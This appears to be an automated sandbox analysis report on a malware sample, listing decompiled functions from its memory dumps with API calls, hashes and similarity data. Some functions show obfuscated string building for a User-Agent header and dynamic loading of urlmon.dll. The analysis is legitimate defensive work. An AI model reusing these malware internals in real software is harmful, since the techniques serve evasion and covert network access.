0x00408323
0x0040832e
0x0040833a
0x0040833e
0x0040834e
0x00408353
0x0040835a
0x0040835d
0x0040836a
0x0040836c
0x0040836e
0x0040838b
0x0040838b
0x00000000
0x0040838d
0x00408392

APIs

PostThreadMessageW.USER32(?,00000111,00000000,00000000,?), ref: 0040836A

Memory Dump Source

Source File: 00000003.00000002.396348614.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_3_2_400000_idxgunu.jbxd

Yara matches

Similarity

API ID: MessagePostThread
String ID:
API String ID: 1836367815-0
Opcode ID: eeb461d9a93cfa80389428809ed4c10d2a707c26e4e5d313531af448f679d8da
Instruction ID: fe648ddaccc693dff6b318d6e20673cc1517f8ca6da234ac2c2ad493b9bfa733
Opcode Fuzzy Hash: eeb461d9a93cfa80389428809ed4c10d2a707c26e4e5d313531af448f679d8da
Instruction Fuzzy Hash: FF018431A8032C76E721A6959C43FFE776C5B40F54F05011AFF04BA1C2EAA8690546EA

Uniqueness

Uniqueness Score: -1.00%

Function 004082D8 Relevance: 1.6, APIs: 1, Instructions: 53
threadwindowCOMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

PostThreadMessageW.USER32(?,00000111,00000000,00000000,?), ref: 0040836A

Memory Dump Source

Source File: 00000003.00000002.396348614.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_3_2_400000_idxgunu.jbxd

Yara matches

Similarity

API ID: MessagePostThread
String ID:
API String ID: 1836367815-0
Opcode ID: 513273eada03b9342c95d2e5e537be130e5ee20e96d952f5360e8c2cdb04192a
Instruction ID: 0616b74cdbd2c06c8b2af6f14d0266791c6beb930aeb5af95f47da66d07b7cc3
Opcode Fuzzy Hash: 513273eada03b9342c95d2e5e537be130e5ee20e96d952f5360e8c2cdb04192a
Instruction Fuzzy Hash: 09012B316403197AE731A5752C03FEB36489B81F64F04016FFE48BA1C1EAA9690642EA

Uniqueness

Uniqueness Score: -1.00%

Function 0041A663 Relevance: 1.5, APIs: 1, Instructions: 25
memoryCOMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

C-Code - Quality: 44%

			E0041A663(void* __eax, intOrPtr _a4, void* _a8, long _a12, void* _a16) {
				char _t13;
				void* _t19;

				asm("std");
				asm("lock add edx, 0x83ffff97");
				asm("fmulp st2, st0");
				asm("sti");
				_t10 = _a4;
				_t4 = _t10 + 0xc74; // 0xc74
				E0041AF60(_t19, _a4, _t4,  *((intOrPtr*)(_a4 + 0x10)), 0, 0x35);
				_t13 = RtlFreeHeap(_a8, _a12, _a16); // executed
				return _t13;
			}

0x0041a664
0x0041a665
0x0041a66c
0x0041a66e
0x0041a673
0x0041a67f
0x0041a687
0x0041a69d
0x0041a6a1

APIs

RtlFreeHeap.NTDLL(00000060,00409CF3,?,?,00409CF3,00000060,00000000,00000000,?,?,00409CF3,?,00000000), ref: 0041A69D

Memory Dump Source

Source File: 00000003.00000002.396348614.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_3_2_400000_idxgunu.jbxd

Yara matches

Similarity

API ID: FreeHeap
String ID:
API String ID: 3298025750-0
Opcode ID: e5b13c149e32cf4a7695202f36eaf45453a730cb95af23a84897f7362efd058b
Instruction ID: 665a1c9025c36f90054f32e33f51ba5fb1a3a56c356f4a9f817cd15bdf25c57f
Opcode Fuzzy Hash: e5b13c149e32cf4a7695202f36eaf45453a730cb95af23a84897f7362efd058b
Instruction Fuzzy Hash: 31E0D8B82442890BD714EF69DC9049B37D5EF80314710995EE85987757C234D96A46F1

Uniqueness

Uniqueness Score: -1.00%

Function 0041A670 Relevance: 1.5, APIs: 1, Instructions: 24
memoryCOMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

C-Code - Quality: 100%

			E0041A670(intOrPtr _a4, void* _a8, long _a12, void* _a16) {
				char _t10;
				void* _t15;

				_t3 = _a4 + 0xc74; // 0xc74
				E0041AF60(_t15, _a4, _t3,  *((intOrPtr*)(_a4 + 0x10)), 0, 0x35);
				_t10 = RtlFreeHeap(_a8, _a12, _a16); // executed
				return _t10;
			}

0x0041a67f
0x0041a687
0x0041a69d
0x0041a6a1

APIs

RtlFreeHeap.NTDLL(00000060,00409CF3,?,?,00409CF3,00000060,00000000,00000000,?,?,00409CF3,?,00000000), ref: 0041A69D

Memory Dump Source

Source File: 00000003.00000002.396348614.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_3_2_400000_idxgunu.jbxd

Yara matches

Similarity

API ID: FreeHeap
String ID:
API String ID: 3298025750-0
Opcode ID: c73a038728a0c461ae7389dd2c659cb336152b082840842379cc140023e4f07c
Instruction ID: 086aab0bc8c344d6c60c9bbd5a0512cabfd8005857d16272e4a7e29987098a06
Opcode Fuzzy Hash: c73a038728a0c461ae7389dd2c659cb336152b082840842379cc140023e4f07c
Instruction Fuzzy Hash: C1E012B1200208ABDB18EF99CC49EA777ACEF88764F118559BA085B242C630E9108AB0

Uniqueness

Uniqueness Score: -1.00%

Function 0041A7D0 Relevance: 1.5, APIs: 1, Instructions: 24
COMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

C-Code - Quality: 100%

			E0041A7D0(intOrPtr _a4, WCHAR* _a8, WCHAR* _a12, struct _LUID* _a16) {
				int _t10;
				void* _t15;

				E0041AF60(_t15, _a4, _a4 + 0xc8c,  *((intOrPtr*)(_a4 + 0xa18)), 0, 0x46);
				_t10 = LookupPrivilegeValueW(_a8, _a12, _a16); // executed
				return _t10;
			}

0x0041a7ea
0x0041a800
0x0041a804

APIs

LookupPrivilegeValueW.ADVAPI32(00000000,0000003C,0040F1D2,0040F1D2,0000003C,00000000,?,00409D65), ref: 0041A800

Memory Dump Source

Source File: 00000003.00000002.396348614.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_3_2_400000_idxgunu.jbxd

Yara matches

Similarity

API ID: LookupPrivilegeValue
String ID:
API String ID: 3899507212-0
Opcode ID: 6066231f07dbbfb97dda43844c8c8cc76a5ad0e3334111b5d8a4297bdf0bdfe7
Instruction ID: 3f9aab8e47c10174471559fee5d267dc63a882ce56825bdd12c8e63267ac542a
Opcode Fuzzy Hash: 6066231f07dbbfb97dda43844c8c8cc76a5ad0e3334111b5d8a4297bdf0bdfe7
Instruction Fuzzy Hash: 23E01AB12002086BDB10DF49CC85EE737ADEF88654F118155BA0C57241C934E8118BF5

Uniqueness

Uniqueness Score: -1.00%

Function 0041A6B0 Relevance: 1.5, APIs: 1, Instructions: 20
COMMON

Download Yara Rule

C-Code - Quality: 100%

			E0041A6B0(intOrPtr _a4, int _a8) {
				void* _t10;

				_t5 = _a4;
				E0041AF60(_t10, _a4, _a4 + 0xc7c,  *((intOrPtr*)(_t5 + 0xa14)), 0, 0x36);
				ExitProcess(_a8);
			}

0x0041a6b3
0x0041a6ca
0x0041a6d8

APIs

ExitProcess.KERNEL32(?,?,00000000,?,?,?), ref: 0041A6D8

Memory Dump Source

Source File: 00000003.00000002.396348614.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_3_2_400000_idxgunu.jbxd

Yara matches

Similarity

API ID: ExitProcess
String ID:
API String ID: 621844428-0
Opcode ID: caa18f4ccbf82a939ed7a560578cfa8cb4ed60065234b72d20cd43f227523b36
Instruction ID: 671013aba82168957284564a3a9f05bc2528e3e40ec9789e05460755300894f7
Opcode Fuzzy Hash: caa18f4ccbf82a939ed7a560578cfa8cb4ed60065234b72d20cd43f227523b36
Instruction Fuzzy Hash: 68D017726002187BD620EB99CC85FD777ACDF48BA4F1580A9BA1C6B242C531BA108AE1

Uniqueness

Uniqueness Score: -1.00%

Function 0133967A Relevance: 1.5, APIs: 1, Instructions: 8libraryCOMMON

Download Yara Rule

APIs

LdrInitializeThunk.NTDLL ref: 01339694

Memory Dump Source

Source File: 00000003.00000002.397353475.00000000012D0000.00000040.00000800.00020000.00000000.sdmp, Offset: 012D0000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_3_2_12d0000_idxgunu.jbxd

Similarity

API ID: InitializeThunk
String ID:
API String ID: 2994545307-0
Opcode ID: aff2848a93a151363f93a2fd1924b56720bbee6846e03afe8024df7c3559baf0
Instruction ID: a4ab471299511e14346808815ac812465a2f38489bf1a4d4109bb17f609530a4
Opcode Fuzzy Hash: aff2848a93a151363f93a2fd1924b56720bbee6846e03afe8024df7c3559baf0
Instruction Fuzzy Hash: FBB09B719064C5C6DA11D7A44608717794477D0759F16C061D1020681B4778D495F6B9

Uniqueness

Uniqueness Score: -1.00%

Non-executed Functions

Function 0041732C Relevance: 5.1, Strings: 4, Instructions: 51
COMMON

Download Yara Rule

C-Code - Quality: 35%

			E0041732C(void* __eax, void* __eflags) {
				intOrPtr* _t14;
				void* _t16;
				void* _t20;
				intOrPtr* _t26;
				void* _t30;

				if(__eflags != 0) {
					 *((intOrPtr*)(_t30 - 0x10)) = 0x412d7265;
					 *((intOrPtr*)(_t30 - 0xc)) = 0x746e6567;
					 *((intOrPtr*)(_t30 - 8)) = 0x203a;
					E0041BDE0();
					_t5 = _t30 - 0x24; // 0x6d6c7275
					_t26 = E00414E50( *((intOrPtr*)(_t30 + 8)) + 0xc94, E0040ACF0(_t16,  *((intOrPtr*)(_t30 + 8)) + 0xc94, __eflags,  *((intOrPtr*)(_t30 + 8)) + 0xc94, _t5), 0, 0, 0x69767207);
					__eflags = _t26;
					if(_t26 == 0) {
						L5:
						__eflags = 0;
						return 0;
					} else {
						_t14 =  *_t26(0, E0041C0B0(_t20) + _t20, _t30 - 4);
						__eflags = _t14;
						if(_t14 != 0) {
							goto L5;
						} else {
							return 1;
						}
					}
				} else {
					asm("int 0x5c");
					_push(_t20);
					return __eax;
				}
			}

0x0041732d
0x00417380
0x00417387
0x0041738e
0x00417395
0x0041739d
0x004173bd
0x004173c2
0x004173c4
0x004173e9
0x004173ea
0x004173f0
0x004173c6
0x004173d8
0x004173da
0x004173dc
0x00000000
0x004173de
0x004173e8
0x004173e8
0x004173dc
0x0041732f
0x0041732f
0x00417331
0x0041733c
0x0041733c

Strings

: , xrefs: 0041738E
er-A, xrefs: 00417380
urlmon.dll, xrefs: 0041739D, 004173A0
gent, xrefs: 00417387

Memory Dump Source

Source File: 00000003.00000002.396348614.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_3_2_400000_idxgunu.jbxd

Yara matches

Similarity

API ID:
String ID: : $er-A$gent$urlmon.dll
API String ID: 0-3839042805
Opcode ID: fc61a7cd1f8c49fc05e6eb29e62a19e9fd2998f5f391a8e557c7e6d5172c348d
Instruction ID: 169f46a9b9918c7cb099a491cb9c1deffe5abaae0d30dbc9755bffd049fda764
Opcode Fuzzy Hash: fc61a7cd1f8c49fc05e6eb29e62a19e9fd2998f5f391a8e557c7e6d5172c348d
Instruction Fuzzy Hash: 9AF02DB2E4111967D7109A829C42FFEB7789B41718F10015BFD08B7240D67D9E4283DA

Uniqueness

Uniqueness Score: -1.00%

Function 0040E47D Relevance: .0, Instructions: 13
COMMON

Download Yara Rule

C-Code - Quality: 68%

			E0040E47D(void* __eax, void* __edi, void* __esi) {
				signed int _t13;

				asm("scasd");
				 *(__edi - 0x30) =  *(__edi - 0x30) & 0x00000003;
				 *((char*)(__esi + _t13 * 2)) =  *((char*)(__esi + _t13 * 2)) - 0xa1;
				return __eax;
			}

0x0040e47d
0x0040e47e
0x0040e482
0x0040e490

Memory Dump Source

Source File: 00000003.00000002.396348614.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_3_2_400000_idxgunu.jbxd

Yara matches

Similarity

API ID:
String ID:
API String ID:
Opcode ID: d072282c666989d14e148d59b3494a38707f11cf8d8986fdab30b1e8bc262dc9
Instruction ID: b3356cf7d152068a79534433ab65292708035814959c2615a7c03780d35168cb
Opcode Fuzzy Hash: d072282c666989d14e148d59b3494a38707f11cf8d8986fdab30b1e8bc262dc9
Instruction Fuzzy Hash: 04C02B03F1958400C3210B39B4001F8FB50C383037E0023D7CCCCB34D1035180120748

Uniqueness

Uniqueness Score: -1.00%

Function 0133AD30 Relevance: .0, Instructions: 4COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000003.00000002.397353475.00000000012D0000.00000040.00000800.00020000.00000000.sdmp, Offset: 012D0000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_3_2_12d0000_idxgunu.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: d4adff0a167f36e0d8524d49d2f05488679efaeebe8602612ea10000851c2cf8
Instruction ID: fa4f4a9b2513214c9f4fda94f94f65c975d13f967c20e360e9d162a18945f578
Opcode Fuzzy Hash: d4adff0a167f36e0d8524d49d2f05488679efaeebe8602612ea10000851c2cf8
Instruction Fuzzy Hash: C1900275B0500013D540719948146464046B7F0785B55C021A0504594CC9949E5963E5

Uniqueness

Uniqueness Score: -1.00%

Function 01339520 Relevance: .0, Instructions: 4COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000003.00000002.397353475.00000000012D0000.00000040.00000800.00020000.00000000.sdmp, Offset: 012D0000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_3_2_12d0000_idxgunu.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 4c188b1bbc36552537bfb024d6e7ebbfb3178287d8a6c81882f50b4d56ae726e
Instruction ID: 6b9ac1a1bd96a400940a03957504ff2e920ec755c917685acf8381ca7824dba0
Opcode Fuzzy Hash: 4c188b1bbc36552537bfb024d6e7ebbfb3178287d8a6c81882f50b4d56ae726e
Instruction Fuzzy Hash: C69002E5301140938900A2998404B0A4545A7F0245B51C026E10445A0CC5659C55A179

Uniqueness

Uniqueness Score: -1.00%

Function 01339560 Relevance: .0, Instructions: 4COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000003.00000002.397353475.00000000012D0000.00000040.00000800.00020000.00000000.sdmp, Offset: 012D0000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_3_2_12d0000_idxgunu.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 434cf4358c5956be4136745e78d426cd2e79fb081c283383d4e67a657b93f1d0
Instruction ID: 472470a6ffff98d364a3ff9902f22dc097f4743644e06d842269a92874cb56d3
Opcode Fuzzy Hash: 434cf4358c5956be4136745e78d426cd2e79fb081c283383d4e67a657b93f1d0
Instruction Fuzzy Hash: 8D900269321000034545A599060450B0485B7E6395391C025F14065D0CC6619C696365

Uniqueness

Uniqueness Score: -1.00%

Function 01339950 Relevance: .0, Instructions: 4COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000003.00000002.397353475.00000000012D0000.00000040.00000800.00020000.00000000.sdmp, Offset: 012D0000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_3_2_12d0000_idxgunu.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: b4828a77cbe1443befea4c678ea44b8fa89313b5df55211102460e2e06ed1504
Instruction ID: 756b356390d65b8badcea5793e43d9d1787d8dd70f9aab7c6352e48ec767365a
Opcode Fuzzy Hash: b4828a77cbe1443befea4c678ea44b8fa89313b5df55211102460e2e06ed1504
Instruction Fuzzy Hash: 749002A530140403D540659948046070045A7E0346F51C021A2054595ECA699C557179

Uniqueness

Uniqueness Score: -1.00%

Function 013395F0 Relevance: .0, Instructions: 4COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000003.00000002.397353475.00000000012D0000.00000040.00000800.00020000.00000000.sdmp, Offset: 012D0000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_3_2_12d0000_idxgunu.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 5bd3804bf9147d62b03535b6d09e2a703f368f50d602e94411716a8ff33c2817
Instruction ID: c427ef3b69ba8096d77fe71a14657ddd74484b125f8854eacbb59b2b26345cf6
Opcode Fuzzy Hash: 5bd3804bf9147d62b03535b6d09e2a703f368f50d602e94411716a8ff33c2817
Instruction Fuzzy Hash: D990027530100803D504619948046860045A7E0345F51C021A6014695ED6A59C957175

Uniqueness

Uniqueness Score: -1.00%

Function 013399D0 Relevance: .0, Instructions: 4COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000003.00000002.397353475.00000000012D0000.00000040.00000800.00020000.00000000.sdmp, Offset: 012D0000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_3_2_12d0000_idxgunu.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 6e90f4b5c153cbebfaf7d5c32a25ceead9dce54ceeb95ba57fd152f8b78e4419
Instruction ID: 1f201ac1247d801fb1d9fa704cb999a3c1f7771114ae7267e572bf62081dbd7c
Opcode Fuzzy Hash: 6e90f4b5c153cbebfaf7d5c32a25ceead9dce54ceeb95ba57fd152f8b78e4419
Instruction Fuzzy Hash: 609002A531100043D504619944047060085A7F1245F51C022A2144594CC5699C656169

Uniqueness

Uniqueness Score: -1.00%

Function 01339820 Relevance: .0, Instructions: 4COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000003.00000002.397353475.00000000012D0000.00000040.00000800.00020000.00000000.sdmp, Offset: 012D0000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_3_2_12d0000_idxgunu.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 80ee67ae46e8b1628744628eaa68994a55716155287d34aabfce8264ecae85b0
Instruction ID: 010cb7898c1e5fca76dc3b8ed2223e7220afba2ffb0be0c0f34fee9f21e62d55
Opcode Fuzzy Hash: 80ee67ae46e8b1628744628eaa68994a55716155287d34aabfce8264ecae85b0
Instruction Fuzzy Hash: 5A90027534100403D541719944046060049B7E0285F91C022A0414594EC6959E5ABAA5

Uniqueness

Uniqueness Score: -1.00%

Function 0133B040 Relevance: .0, Instructions: 4COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000003.00000002.397353475.00000000012D0000.00000040.00000800.00020000.00000000.sdmp, Offset: 012D0000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_3_2_12d0000_idxgunu.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: bf6ca5220302860a55feae38c660aa099275f0d8a8556dfb6c5cb0794e734591
Instruction ID: cb986218aeef8d4b7a72f5d34cc8a3d59789fd02280dc36f5843a9f764379375
Opcode Fuzzy Hash: bf6ca5220302860a55feae38c660aa099275f0d8a8556dfb6c5cb0794e734591
Instruction Fuzzy Hash: 8C9002A5701140438940B19948044065055B7F1345391C131A04445A0CC6A89C59A2A9

Uniqueness

Uniqueness Score: -1.00%

Function 013398A0 Relevance: .0, Instructions: 4COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000003.00000002.397353475.00000000012D0000.00000040.00000800.00020000.00000000.sdmp, Offset: 012D0000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_3_2_12d0000_idxgunu.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: ef2dbb96300cf6dfc86cccc738639a844f0069b43fa8bf93e9fd2e4660356623
Instruction ID: 00cdc0678566b3aa111db032f72f52df3d838c1c649125a9f4956d1ad7196ff1
Opcode Fuzzy Hash: ef2dbb96300cf6dfc86cccc738639a844f0069b43fa8bf93e9fd2e4660356623
Instruction Fuzzy Hash: BD90026530100403D502619944146060049E7E1389F91C022E1414595DC6659D57B176

Uniqueness

Uniqueness Score: -1.00%

Function 01339730 Relevance: .0, Instructions: 4COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000003.00000002.397353475.00000000012D0000.00000040.00000800.00020000.00000000.sdmp, Offset: 012D0000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_3_2_12d0000_idxgunu.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 9388be4037ae6a7484f22415c6e3475c0635933ef699e6d8eb31d475273b5afe
Instruction ID: b78e9cdfcccaa4905322989526a2cb5f35348b8b70c2ce096fd2d1b4fc0f0fbb
Opcode Fuzzy Hash: 9388be4037ae6a7484f22415c6e3475c0635933ef699e6d8eb31d475273b5afe
Instruction Fuzzy Hash: 4B90026570500403D540719954187060055A7E0245F51D021A0014594DC6999E5976E5

Uniqueness

Uniqueness Score: -1.00%

Function 0133A710 Relevance: .0, Instructions: 4COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000003.00000002.397353475.00000000012D0000.00000040.00000800.00020000.00000000.sdmp, Offset: 012D0000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_3_2_12d0000_idxgunu.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 94d456dc2d82061ce4a93b50c4692ab68618099c5b3983cc578f4b63f300e4af
Instruction ID: 06e3de2e285c598fd26e715895daac67aa27a58e200b2a1b6d64d8c72f3ceb73
Opcode Fuzzy Hash: 94d456dc2d82061ce4a93b50c4692ab68618099c5b3983cc578f4b63f300e4af
Instruction Fuzzy Hash: 2790027530100053D900A6D95804A4A4145A7F0345B51D025A4004594CC5949C656165

Uniqueness

Uniqueness Score: -1.00%

Function 01339B00 Relevance: .0, Instructions: 4COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000003.00000002.397353475.00000000012D0000.00000040.00000800.00020000.00000000.sdmp, Offset: 012D0000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_3_2_12d0000_idxgunu.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 506a858d0b2698b8bfb9d1f9b742d38b1cf866d7c7abbb6cb9ed893d9882e4aa
Instruction ID: 9acbfa86286a012fdcd2fb2d0083048e733451c8b8957ec4e41cb58ebcce6e1b
Opcode Fuzzy Hash: 506a858d0b2698b8bfb9d1f9b742d38b1cf866d7c7abbb6cb9ed893d9882e4aa
Instruction Fuzzy Hash: 2590026534100803D540719984147070046E7E0645F51C021A0014594DC6569D6976F5

Uniqueness

Uniqueness Score: -1.00%

Function 0133A770 Relevance: .0, Instructions: 4COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000003.00000002.397353475.00000000012D0000.00000040.00000800.00020000.00000000.sdmp, Offset: 012D0000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_3_2_12d0000_idxgunu.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: ddbf296e2812b2e3795c037dace6677c31538b00feee8edf2bb3b646d43beb2a
Instruction ID: 46a34945c747216d8dc890e7f72302a81ec35f05613b344d3b01d350233ae1b7
Opcode Fuzzy Hash: ddbf296e2812b2e3795c037dace6677c31538b00feee8edf2bb3b646d43beb2a
Instruction Fuzzy Hash: 2890027930504443D90065995804A870045A7E0349F51D421A04145DCDC6949C65B165

Uniqueness

Uniqueness Score: -1.00%

Function 01339770 Relevance: .0, Instructions: 4COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000003.00000002.397353475.00000000012D0000.00000040.00000800.00020000.00000000.sdmp, Offset: 012D0000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_3_2_12d0000_idxgunu.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: c73b3ada6945b081bf5eedc4375ce5ecca40c8b66d33d0a4f7245461ac308b43
Instruction ID: 071733d73c8eca645f5df66ff1d27b5c204c7d12046b5446f377c1674e2eeeb3
Opcode Fuzzy Hash: c73b3ada6945b081bf5eedc4375ce5ecca40c8b66d33d0a4f7245461ac308b43
Instruction Fuzzy Hash: 4790026530504443D50065995408A060045A7E0249F51D021A10545D5DC6759C55B175

Uniqueness

Uniqueness Score: -1.00%

Function 01339760 Relevance: .0, Instructions: 4COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000003.00000002.397353475.00000000012D0000.00000040.00000800.00020000.00000000.sdmp, Offset: 012D0000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_3_2_12d0000_idxgunu.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 625e597526c2e0c332c2fa780e8de5b5c0a0877be67af0823c0d92f271928f32
Instruction ID: 998b2a0d09c2e5674442d2f79027986e5ed51b2a1c3a48085ee7b0763d5da455
Opcode Fuzzy Hash: 625e597526c2e0c332c2fa780e8de5b5c0a0877be67af0823c0d92f271928f32
Instruction Fuzzy Hash: D090027530100403D500619955087070045A7E0245F51D421A0414598DD6969C557165

Uniqueness

Uniqueness Score: -1.00%

Function 0133A3B0 Relevance: .0, Instructions: 4COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000003.00000002.397353475.00000000012D0000.00000040.00000800.00020000.00000000.sdmp, Offset: 012D0000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_3_2_12d0000_idxgunu.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 759c5165cd4b5299ea400489d4e16d6623a735fb934615f3955a61bb6619ae2d
Instruction ID: 51af02bee9fe89939e1b6d91db2e241d19d464edf13654c2bce05e0c4bf09bf7
Opcode Fuzzy Hash: 759c5165cd4b5299ea400489d4e16d6623a735fb934615f3955a61bb6619ae2d
Instruction Fuzzy Hash: 9790027530144003D5407199844460B5045B7F0345F51C421E0415594CC6559C5AA265

Uniqueness

Uniqueness Score: -1.00%

Function 01339FE0 Relevance: .0, Instructions: 4COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000003.00000002.397353475.00000000012D0000.00000040.00000800.00020000.00000000.sdmp, Offset: 012D0000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_3_2_12d0000_idxgunu.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 65e70d4395252f6a69957317b0d2969285b0f2d601373ff12f221bcb9b1c8d04
Instruction ID: a8160ebdd8352e378aa54f96549d4aae36abb4591ec7690190b2ada1cb3e86e5
Opcode Fuzzy Hash: 65e70d4395252f6a69957317b0d2969285b0f2d601373ff12f221bcb9b1c8d04
Instruction Fuzzy Hash: 4990027531114403D510619984047060045A7E1245F51C421A0814598DC6D59C957166

Uniqueness

Uniqueness Score: -1.00%

Function 01339A10 Relevance: .0, Instructions: 4COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000003.00000002.397353475.00000000012D0000.00000040.00000800.00020000.00000000.sdmp, Offset: 012D0000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_3_2_12d0000_idxgunu.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 665121b0b3849f1634c47eca13597021629cf09990d8b7cc0f26570829e5928d
Instruction ID: d05518ad3a8d2d4caf5568ba245a600de24cfb19bbfe3c6f3656ad66b18f26f9
Opcode Fuzzy Hash: 665121b0b3849f1634c47eca13597021629cf09990d8b7cc0f26570829e5928d
Instruction Fuzzy Hash: 1990027530140403D500619948087470045A7E0346F51C021A5154595EC6A5DC957575

Uniqueness

Uniqueness Score: -1.00%

Function 01339610 Relevance: .0, Instructions: 4COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000003.00000002.397353475.00000000012D0000.00000040.00000800.00020000.00000000.sdmp, Offset: 012D0000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_3_2_12d0000_idxgunu.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: fd3bb8324a40f26872fee055107edd95134ffef2bb4a6bec7626615879e08f16
Instruction ID: 120badab2b8587ac91358b55cc61028a764c381a5ca6134b699c8ca70801846d
Opcode Fuzzy Hash: fd3bb8324a40f26872fee055107edd95134ffef2bb4a6bec7626615879e08f16
Instruction Fuzzy Hash: 7A90027570500803D550719944147460045A7E0345F51C021A0014694DC7959E5976E5

Uniqueness

Uniqueness Score: -1.00%

Function 01339A80 Relevance: .0, Instructions: 4COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000003.00000002.397353475.00000000012D0000.00000040.00000800.00020000.00000000.sdmp, Offset: 012D0000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_3_2_12d0000_idxgunu.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: d19b315cd2491860a8a59cc98a5b02dafb8856ac362fd8141142688cac6912c9
Instruction ID: 817a2cbd9d05fdf042fc7c7ebe7eccb1e8e9f9239af926bf8cd9404d89da16d3
Opcode Fuzzy Hash: d19b315cd2491860a8a59cc98a5b02dafb8856ac362fd8141142688cac6912c9
Instruction Fuzzy Hash: 5A90026530144443D54062994804B0F4145A7F1246F91C029A4146594CC9559C596765

Uniqueness

Uniqueness Score: -1.00%

Function 01339670 Relevance: .0, Instructions: 2COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000003.00000002.397353475.00000000012D0000.00000040.00000800.00020000.00000000.sdmp, Offset: 012D0000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_3_2_12d0000_idxgunu.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: a3d3d3c0123cddb368cc51eab9da9c3aaeeac76cd7bbfae310620ba6f7f49b43
Instruction ID: 4b35dba2125d285dcd48adc6fbf2b318460dca7ccc4b050fa132131f8f1e56b2
Opcode Fuzzy Hash: a3d3d3c0123cddb368cc51eab9da9c3aaeeac76cd7bbfae310620ba6f7f49b43
Instruction Fuzzy Hash:

Uniqueness

Uniqueness Score: -1.00%

